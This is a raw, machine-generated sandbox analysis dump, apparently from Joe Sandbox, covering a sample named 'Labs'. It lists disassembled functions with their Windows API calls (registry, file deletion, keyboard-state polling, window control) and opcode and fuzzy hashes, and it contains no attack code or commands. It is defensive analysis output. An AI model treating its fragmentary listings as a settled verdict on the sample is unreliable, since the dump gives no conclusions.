                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 53f71a272c40676edacecf9ef73a426757efe699f13194862760e9aeea484c42
                                                    • Instruction ID: 42062161530bf136b37acc7d2d978e49a320bf604dadcbdf96a138efe7568dd6
                                                    • Opcode Fuzzy Hash: 53f71a272c40676edacecf9ef73a426757efe699f13194862760e9aeea484c42
                                                    • Instruction Fuzzy Hash: DB513771904649EFCB24CFA9CC85FAEBBB9FF48310F14842DE95AA7210D635A940CB60
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA4D4
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 007DA4F6
                                                    • __swprintf.LIBCMT ref: 007DA54F
                                                    • __swprintf.LIBCMT ref: 007DA568
                                                    • _wprintf.LIBCMT ref: 007DA61E
                                                    • _wprintf.LIBCMT ref: 007DA63C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-2391861430
                                                    • Opcode ID: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
                                                    • Instruction ID: 238d89e686884dbe5f7623b202c3c9c64949fb6d82d6af2372ad7a300017252c
                                                    • Opcode Fuzzy Hash: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
                                                    • Instruction Fuzzy Hash: 44519B71840219FACF14FBA0DD4AEEEB779BF04340F500166F505A22A2EB396F59CB61
                                                    APIs
                                                      • Part of subcall function 007D951A: __time64.LIBCMT ref: 007D9524
                                                      • Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4
                                                    • __wsplitpath.LIBCMT ref: 007D97EF
                                                      • Part of subcall function 0079431E: __wsplitpath_helper.LIBCMT ref: 0079435E
                                                    • _wcscpy.LIBCMT ref: 007D9802
                                                    • _wcscat.LIBCMT ref: 007D9815
                                                    • __wsplitpath.LIBCMT ref: 007D983A
                                                    • _wcscat.LIBCMT ref: 007D9850
                                                    • _wcscat.LIBCMT ref: 007D9863
                                                      • Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D9599
                                                      • Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D95A8
                                                    • _wcscmp.LIBCMT ref: 007D97AA
                                                      • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
                                                      • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9A0D
                                                    • _wcsncpy.LIBCMT ref: 007D9A80
                                                    • DeleteFileW.KERNEL32(?,?), ref: 007D9AB6
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D9ACC
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9ADD
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9AEF
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: b85c2bef07a085968b54a723a245bebf3eee8d9c95646a29f121a556f18c9891
                                                    • Instruction ID: 78306b6728a083c2d271600e92d9d57958030c157306b351603090abb624f420
                                                    • Opcode Fuzzy Hash: b85c2bef07a085968b54a723a245bebf3eee8d9c95646a29f121a556f18c9891
                                                    • Instruction Fuzzy Hash: 2EC13CB1900219AADF15DFA5CC89EDEB7BDEF44300F0040ABF609E6251EB749A848F65
                                                    APIs
                                                    • _memset.LIBCMT ref: 00785BF1
                                                    • GetMenuItemCount.USER32(00837890), ref: 007C0E7B
                                                    • GetMenuItemCount.USER32(00837890), ref: 007C0F2B
                                                    • GetCursorPos.USER32(?), ref: 007C0F6F
                                                    • SetForegroundWindow.USER32(00000000), ref: 007C0F78
                                                    • TrackPopupMenuEx.USER32(00837890,00000000,?,00000000,00000000,00000000), ref: 007C0F8B
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C0F97
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 2751501086-0
                                                    • Opcode ID: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
                                                    • Instruction ID: 56ed2ec339b2bf5c5423f0e6caa5f2a319abc62125fa231d4428731edf65963b
                                                    • Opcode Fuzzy Hash: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
                                                    • Instruction Fuzzy Hash: 7C71C070684619FEEB20AB54DC89FAABF64FF04764F10021AF524A61D1C7B96860DFE0
                                                    APIs
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    • _memset.LIBCMT ref: 007C8489
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C84BE
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C84DA
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C84F6
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C8520
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C8548
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8553
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8558
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 1cc3a2f7f5b3a9aa1e0b3d4a314c68965b63ca58c032f3e14b10a0981fb85658
                                                    • Instruction ID: e2434bca671cb4799cd6d762fc763099d4652b140936a7a6cda077dc99bd8071
                                                    • Opcode Fuzzy Hash: 1cc3a2f7f5b3a9aa1e0b3d4a314c68965b63ca58c032f3e14b10a0981fb85658
                                                    • Instruction Fuzzy Hash: 3E410872C5022DEBCF15EBA4EC99EEDB778FF04350F404169E815A2261EB385E05CB90
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
                                                    • Instruction ID: 979b01e3bbd853ef8f58cb239cc7fede9774296427fadf3a3ae9b0249ad4a577
                                                    • Opcode Fuzzy Hash: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
                                                    • Instruction Fuzzy Hash: FA41F97065026ECBDF04EFA0E855AFA3724FF51300FA04455EE5297252DB38AD69CBA1
                                                    APIs
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                      • Part of subcall function 0078153B: _memmove.LIBCMT ref: 007815C4
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D58EB
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D5901
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D5912
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5924
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D5935
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
                                                    • Instruction ID: 199096a11fbfa0c8046d5fce243e909092b75bc7d0437cde58ce0d51898af253
                                                    • Opcode Fuzzy Hash: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
                                                    • Instruction Fuzzy Hash: 41119331591169F9D720F7A1DC5EDBF6BBCFB91B50F80042AB411E22D0DE682945C6A0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: c57c0c202db1ea10d5f5125d450809d1af7c3a1b24052bf5b8f3009ba7875036
                                                    • Instruction ID: d037bdbe5b2916617e26b738a6da49efab2da7622937cb65ef62a6583586543b
                                                    • Opcode Fuzzy Hash: c57c0c202db1ea10d5f5125d450809d1af7c3a1b24052bf5b8f3009ba7875036
                                                    • Instruction Fuzzy Hash: 2E11D231515118BFCB61B764EC4AEEA77BCEF41710F0441A6F04896292EF7999828AA1
                                                    APIs
                                                    • timeGetTime.WINMM ref: 007D5535
                                                      • Part of subcall function 00790859: timeGetTime.WINMM(?,00000002,0077C22C), ref: 0079085D
                                                    • Sleep.KERNEL32(0000000A), ref: 007D5561
                                                    • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 007D5585
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D55A7
                                                    • SetActiveWindow.USER32 ref: 007D55C6
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D55D4
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 007D55F3
                                                    • Sleep.KERNEL32(000000FA), ref: 007D55FE
                                                    • IsWindow.USER32 ref: 007D560A
                                                    • EndDialog.USER32(00000000), ref: 007D561B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: 656363e80c9fcda770d2b60a740c882779ab9b3f76ccb386f67d2527165fafd6
                                                    • Instruction ID: 2ce5814281eafd52e59170c3463d2edc06c8cd6f1e5223cfab0801c907ca0f43
                                                    • Opcode Fuzzy Hash: 656363e80c9fcda770d2b60a740c882779ab9b3f76ccb386f67d2527165fafd6
                                                    • Instruction Fuzzy Hash: 512196B0204704EFEB915B60FC89B263B7BFB95746F441816F50282361DF799E509F62
                                                    APIs
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • CoInitialize.OLE32(00000000), ref: 007DDC2D
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DDCC0
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 007DDCD4
                                                    • CoCreateInstance.OLE32(00803D4C,00000000,00000001,0082B86C,?), ref: 007DDD20
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DDD8F
                                                    • CoTaskMemFree.OLE32(?,?), ref: 007DDDE7
                                                    • _memset.LIBCMT ref: 007DDE24
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 007DDE60
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DDE83
                                                    • CoTaskMemFree.OLE32(00000000), ref: 007DDE8A
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DDEC1
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 007DDEC3
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 6fa4f56b947508227cad00b8221e2688352a6aa9cda7a8a2f6a41620de148e18
                                                    • Instruction ID: 49cd3762ea4149259616fccc2272225ff25d36bee8794018c8fc608ffbf565f4
                                                    • Opcode Fuzzy Hash: 6fa4f56b947508227cad00b8221e2688352a6aa9cda7a8a2f6a41620de148e18
                                                    • Instruction Fuzzy Hash: C7B1C775A00109EFDB14DFA4C888EAEBBB9FF48314F148469E909EB351DB34AD45CB54
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 007D0896
                                                    • SetKeyboardState.USER32(?), ref: 007D0901
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 007D0921
                                                    • GetKeyState.USER32(000000A0), ref: 007D0938
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 007D0967
                                                    • GetKeyState.USER32(000000A1), ref: 007D0978
                                                    • GetAsyncKeyState.USER32(00000011), ref: 007D09A4
                                                    • GetKeyState.USER32(00000011), ref: 007D09B2
                                                    • GetAsyncKeyState.USER32(00000012), ref: 007D09DB
                                                    • GetKeyState.USER32(00000012), ref: 007D09E9
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 007D0A12
                                                    • GetKeyState.USER32(0000005B), ref: 007D0A20
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 0e32e645fbb90001c8f416b8b5b6aa2d285df91c2def130f6cee441d63c5e647
                                                    • Instruction ID: e40590f2e9bd40b04ea3b35c56862b79f26d2e2ff8878de1697e4544c2fadf44
                                                    • Opcode Fuzzy Hash: 0e32e645fbb90001c8f416b8b5b6aa2d285df91c2def130f6cee441d63c5e647
                                                    • Instruction Fuzzy Hash: 4051CB3090478469FB35D7B048147AABFB49F01380F48959FD5C6577C3DA68AA8CCBE1
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 007CCE1C
                                                    • GetWindowRect.USER32(00000000,?), ref: 007CCE2E
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CCE8C
                                                    • GetDlgItem.USER32(?,00000002), ref: 007CCE97
                                                    • GetWindowRect.USER32(00000000,?), ref: 007CCEA9
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CCEFD
                                                    • GetDlgItem.USER32(?,000003E9), ref: 007CCF0B
                                                    • GetWindowRect.USER32(00000000,?), ref: 007CCF1C
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CCF5F
                                                    • GetDlgItem.USER32(?,000003EA), ref: 007CCF6D
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CCF8A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007CCF97
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 544b0ecd125e145de27c6c4376d1210267d2f42279131c8b3923043b93752c2f
                                                    • Instruction ID: c789bbd7df7d09159d49412f1e03f432bb98967368d77dc36331bb292d410870
                                                    • Opcode Fuzzy Hash: 544b0ecd125e145de27c6c4376d1210267d2f42279131c8b3923043b93752c2f
                                                    • Instruction Fuzzy Hash: FB513F71B00205AFDB18CFA8CD85FAEBBBAFB88711F14812DF519D7290DB75A9008B50
                                                    APIs
                                                      • Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007724AF
                                                    • KillTimer.USER32(-00000001,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 0077254A
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 007ABFE7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC018
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC02F
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC04B
                                                    • DeleteObject.GDI32(00000000), ref: 007AC05D
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 378a9ec5dc7e248041b62daf2dfbd3b6979fd578f7b4ddbb1c4517f688cd6ecd
                                                    • Instruction ID: 128e88de6ccbec1a2ebe13946333b59604eaeff8a5236439630daa0b88c213c1
                                                    • Opcode Fuzzy Hash: 378a9ec5dc7e248041b62daf2dfbd3b6979fd578f7b4ddbb1c4517f688cd6ecd
                                                    • Instruction Fuzzy Hash: A6619B31114640EFDB369F14CD48B2AB7F1FB81352F10CA28E06A56A61C779EC92DF94
                                                    APIs
                                                      • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                    • GetSysColor.USER32(0000000F), ref: 007725AF
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 286c158575d676603352d1b91788e2ab34b930fcdf09a5348d6a2066ab0bb5b7
                                                    • Instruction ID: 9600fdb91f2e8d51f28b24716e9ea46a2ea3625ffe7cfef4e0dcc24445fb98c9
                                                    • Opcode Fuzzy Hash: 286c158575d676603352d1b91788e2ab34b930fcdf09a5348d6a2066ab0bb5b7
                                                    • Instruction Fuzzy Hash: 3D41A131104144AFDF215F289C88BB93765FB4A371F188362FE798A1E6D7388C42DB61
                                                    APIs
                                                      • Part of subcall function 00790B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00782A3E,?,00008000), ref: 00790BA7
                                                      • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00782C2C
                                                      • Part of subcall function 00783EBE: _wcscpy.LIBCMT ref: 00783EF6
                                                      • Part of subcall function 0079386D: _iswctype.LIBCMT ref: 00793875
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
